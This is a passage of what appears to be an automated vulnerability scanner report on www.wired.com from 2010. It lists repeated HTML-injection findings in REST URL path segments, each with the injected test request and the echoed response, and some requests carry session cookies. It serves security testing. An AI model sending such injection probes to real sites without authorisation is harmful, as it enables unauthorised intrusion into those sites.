The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ab"><a>79fd2601542 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music/news794ab"><a>79fd2601542/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:22 GMT
Date: Sun, 21 Nov 2010 23:08:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music c_news794ab"><a>79fd2601542">
...[SNIP]...

1.552. http://www.wired.com/entertainment/theweb [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/theweb

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0dc"><a>6d583e3f06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment7e0dc"><a>6d583e3f06/theweb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Sun, 21 Nov 2010 23:11:12 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment7e0dc"><a>6d583e3f06 ss_theweb">
...[SNIP]...

1.553. http://www.wired.com/entertainment/theweb [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/theweb

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ebb"><a>01d211d6eae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/theweb52ebb"><a>01d211d6eae HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29337
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:02 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_theweb52ebb"><a>01d211d6eae">
...[SNIP]...

1.554. http://www.wired.com/gadgets [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f0b"><a>06f0bc5b429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets24f0b"><a>06f0bc5b429 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29331
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:14:33 GMT
Date: Mon, 22 Nov 2010 01:10:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets24f0b"><a>06f0bc5b429">
...[SNIP]...

1.555. http://www.wired.com/gadgets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d3c4"><a>44e9ad792ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets5d3c4"><a>44e9ad792ff/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29332
Vary: Accept-Encoding
Cache-Control: max-age=224
Expires: Sun, 21 Nov 2010 20:17:08 GMT
Date: Sun, 21 Nov 2010 20:13:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets5d3c4"><a>44e9ad792ff">
...[SNIP]...

1.556. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/digitalcameras

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f24"><a>01629cf0b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets20f24"><a>01629cf0b9a/digitalcameras HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 23:11:26 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets20f24"><a>01629cf0b9a ss_digitalcameras">
...[SNIP]...

1.557. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/digitalcameras

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0fc"><a>827ec64b19b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/digitalcamerascb0fc"><a>827ec64b19b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:57 GMT
Date: Sun, 21 Nov 2010 23:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_digitalcamerascb0fc"><a>827ec64b19b">
...[SNIP]...

1.558. http://www.wired.com/gadgets/displays [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/displays

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfac"><a>5cabf0c5d32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets4bfac"><a>5cabf0c5d32/displays HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:43 GMT
Date: Sun, 21 Nov 2010 23:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets4bfac"><a>5cabf0c5d32 ss_displays">
...[SNIP]...

1.559. http://www.wired.com/gadgets/displays [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/displays

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db025"><a>555d174deea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/displaysdb025"><a>555d174deea HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:07 GMT
Date: Sun, 21 Nov 2010 23:08:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_displaysdb025"><a>555d174deea">
...[SNIP]...

1.560. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/gadgetreviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba86"><a>e8f52bb4221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgetsdba86"><a>e8f52bb4221/gadgetreviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:57 GMT
Date: Sun, 21 Nov 2010 23:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgetsdba86"><a>e8f52bb4221 ss_gadgetreviews">
...[SNIP]...

1.561. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/gadgetreviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e399"><a>cebb494f95a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/gadgetreviews1e399"><a>cebb494f95a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:32 GMT
Date: Sun, 21 Nov 2010 23:08:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_gadgetreviews1e399"><a>cebb494f95a">
...[SNIP]...

1.562. http://www.wired.com/gadgets/mac [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mac

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d93"><a>5fa7d6b4d51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgetsa8d93"><a>5fa7d6b4d51/mac HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Sun, 21 Nov 2010 23:11:41 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgetsa8d93"><a>5fa7d6b4d51 ss_mac">
...[SNIP]...

1.563. http://www.wired.com/gadgets/mac [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mac

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821e8"><a>04b40dd3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/mac821e8"><a>04b40dd3412 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=551
Expires: Sun, 21 Nov 2010 23:17:48 GMT
Date: Sun, 21 Nov 2010 23:08:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_mac821e8"><a>04b40dd3412">
...[SNIP]...

1.564. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/miscellaneous

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90641"><a>ba5864f027 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets90641"><a>ba5864f027/miscellaneous HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29360
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:12:03 GMT
Date: Sun, 21 Nov 2010 23:08:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets90641"><a>ba5864f027 ss_miscellaneous">
...[SNIP]...

1.565. http://www.wired.com/gadgets/miscellaneous [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/miscellaneous

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae2a5"><a>4df9c3f8bcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/miscellaneousae2a5"><a>4df9c3f8bcc HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:38 GMT
Date: Sun, 21 Nov 2010 23:08:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_miscellaneousae2a5"><a>4df9c3f8bcc">
...[SNIP]...

1.566. http://www.wired.com/gadgets/mods [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mods

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c6cc"><a>2ec7c30f53a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets5c6cc"><a>2ec7c30f53a/mods HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29344
Vary: Accept-Encoding
Cache-Control: max-age=231
Expires: Sun, 21 Nov 2010 23:12:08 GMT
Date: Sun, 21 Nov 2010 23:08:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets5c6cc"><a>2ec7c30f53a ss_mods">
...[SNIP]...

1.567. http://www.wired.com/gadgets/mods [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mods

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload edc27"><a>e4a182d7a54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/modsedc27"><a>e4a182d7a54 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
